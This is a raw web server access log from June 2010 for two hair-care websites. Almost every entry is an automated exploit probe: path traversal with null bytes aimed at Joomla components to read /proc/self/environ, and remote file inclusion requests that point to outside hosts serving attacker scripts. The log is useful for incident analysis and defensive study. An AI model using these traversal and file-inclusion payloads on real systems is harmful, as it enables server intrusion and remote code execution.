174.37.19.40 - - [21/Jun/2010:03:43:24 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:03:43:24 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:03:43:53 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:03:43:54 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:03:44:20 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:03:44:21 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:03:44:27 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:03:44:27 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:03:44:27 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:03:44:48 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:03:44:51 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:03:44:55 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:03:44:55 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:03:44:56 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:03:45:31 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:03:45:34 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:45:37 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:03:45:46 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:03:45:46 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:03:45:47 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:03:45:49 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:03:45:49 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:03:45:49 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:03:46:01 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.228.62.66 - - [21/Jun/2010:03:46:08 -0700] "GET /logs/access_100426.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:03:46:08 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:03:46:08 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.120.217.47 - - [21/Jun/2010:03:46:10 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.120.217.47 - - [21/Jun/2010:03:46:10 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.120.217.47 - - [21/Jun/2010:03:46:10 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:03:46:34 -0700] "GET /logs/*.?option=com_gcalendar&vieww=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
67.228.62.66 - - [21/Jun/2010:03:46:34 -0700] "GET /*.?option=com_gcalendar&vieww=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
67.228.62.66 - - [21/Jun/2010:03:46:35 -0700] "GET /logs/access.log/*.?option=com_gcalendar&vieww=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
173.160.141.237 - - [21/Jun/2010:03:46:37 -0700] "GET /logs/access_100426.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
173.160.141.237 - - [21/Jun/2010:03:46:37 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
173.160.141.237 - - [21/Jun/2010:03:46:38 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:03:47:00 -0700] "GET /*.?option=com_gcalendar&vieww=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:47:00 -0700] "GET /logs/*.?option=com_gcalendar&vieww=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:47:00 -0700] "GET /logs/access.log%20%20/*.?option=com_gcalendar&vieww=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:47:09 -0700] "GET /*.?option=com_gcalendar&vieww=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:47:09 -0700] "GET /logs/access.log%20%20/*.?option=com_gcalendar&vieww=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:03:47:09 -0700] "GET /logs/*.?option=com_gcalendar&vieww=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:03:48:15 -0700] "GET /logs/access_100405.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:03:48:15 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:03:48:16 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:48:24 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:48:24 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:48:25 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:03:48:47 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13332 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:03:48:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17990 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
220.181.94.229 - - [21/Jun/2010:03:49:07 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
202.69.8.131 - - [21/Jun/2010:03:50:15 -0700] "GET /logs/access_091214.log HTTP/1.1" 200 793223 "http://www.freehairsecrets.com/logs/access_091214.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)" "www.freehairsecrets.com"
174.120.217.47 - - [21/Jun/2010:03:50:42 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.120.217.47 - - [21/Jun/2010:03:51:05 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
95.215.0.123 - - [21/Jun/2010:03:51:20 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.40.96.137 - - [21/Jun/2010:03:51:38 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
95.215.0.123 - - [21/Jun/2010:03:51:57 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
67.228.62.66 - - [21/Jun/2010:03:52:19 -0700] "GET /logs/access.log%20%20/*.?option=com_gcalendar&vieww=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
213.115.31.121 - - [21/Jun/2010:03:52:19 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.96.137 - - [21/Jun/2010:03:52:21 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
89.108.64.232 - - [21/Jun/2010:03:52:30 -0700] "GET //bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
213.115.31.121 - - [21/Jun/2010:03:53:01 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:03:53:58 -0700] "GET /logs/access_100426.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:03:53:58 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:03:53:59 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:03:54:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13407 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:03:54:32 -0700] "GET /logs/access_100426.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:03:54:33 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:03:54:34 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.196.124.2 - - [21/Jun/2010:03:55:01 -0700] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ahgoobaby.com/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
91.196.124.2 - - [21/Jun/2010:03:55:01 -0700] "GET /logs/access_100125.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ahgoobaby.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.196.124.2 - - [21/Jun/2010:03:55:01 -0700] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ahgoobaby.com/1.jpg?? HTTP/1.1" 200 6091 "-" "Mozilla/5.0" "growlonghairfast.com"
91.196.124.2 - - [21/Jun/2010:03:55:08 -0700] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ahgoobaby.com/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
91.196.124.2 - - [21/Jun/2010:03:55:08 -0700] "GET /logs/access_100125.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ahgoobaby.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.196.124.2 - - [21/Jun/2010:03:55:08 -0700] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ahgoobaby.com/1.jpg?? HTTP/1.1" 200 6091 "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:03:55:33 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:03:55:33 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:03:55:34 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:03:56:23 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:56:23 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:56:24 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:03:56:28 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:03:56:28 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:03:56:29 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:56:31 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:56:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:56:33 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:56:42 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:03:56:43 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:03:56:43 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
199.71.216.194 - - [21/Jun/2010:03:57:15 -0700] "GET /logs/access_091214.log HTTP/1.1" 200 793223 "http://growlonghairfast.com/logs/access_091214.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:57:21 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:57:22 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
183.180.127.14 - - [21/Jun/2010:03:57:22 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
208.115.138.254 - - [21/Jun/2010:03:57:23 -0700] "GET /logs/access_091214.log HTTP/1.1" 200 524288 "-" "Mozilla/4.0" "growlonghairfast.com"
66.249.65.216 - - [21/Jun/2010:03:57:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=3277 HTTP/1.1" 200 349 "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:03:58:24 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:03:58:25 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:03:58:26 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:03:59:06 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:03:59:07 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:03:59:07 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
211.53.209.67 - - [21/Jun/2010:04:00:10 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&vieww=gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.53.209.67 - - [21/Jun/2010:04:00:11 -0700] "GET /index2.php?option=com_gcalendar&vieww=gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.53.209.67 - - [21/Jun/2010:04:00:12 -0700] "GET /logs/index2.php?option=com_gcalendar&vieww=gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
